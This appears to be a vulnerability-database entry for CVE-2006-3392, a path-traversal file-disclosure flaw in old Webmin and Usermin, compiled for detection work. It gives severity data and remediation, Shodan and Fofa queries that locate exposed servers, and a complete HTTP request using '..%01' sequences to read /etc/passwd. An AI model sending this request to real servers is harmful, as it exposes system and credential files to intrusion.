🔙 목록으로 돌아가기

CVE-2006-3392: Webmin < 1.290 / Usermin < 1.220 - Arbitrary File Disclosure

TitleWebmin < 1.290 / Usermin < 1.220 - Arbitrary File Disclosure
Authors4e-io
SeverityMedium
ImpactAttackers can read arbitrary files on the server, potentially exposing sensitive information.
RemediationUpdate to Webmin 1.290 and Usermin 1.220 or later versions.
CVSS Score5.0
EPSS Score0.78348
CVE IDCVE-2006-3392
CWE IDCWE-22
Shodan Queryhttp.title:"webmin"
Fofa Querytitle="webmin"
Tags cve cve2006 webmin usermin lfi traversal unauth vuln

🔍 Vulnerability Description

Webmin before 1.290 and Usermin before 1.220 contain a path traversal caused by calling the simplify_path function before decoding HTML, letting remote attackers read arbitrary files, exploit requires sending crafted ‘..%01’ sequences.

🌐 HTTP Request

GET /unauthenticated/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/etc/passwd HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.6 Safari/605.1.15
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

📚 References


🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2006/CVE-2006-3392.yaml

🦈 Packet Capture: ⬇️ Download cve-2006-3392.pcap

⚠️ Notice: These rules are for detection purposes. Please tune them before applying to a production environment.
Snort 2 Rule
N/A
Snort 3 Rule
N/A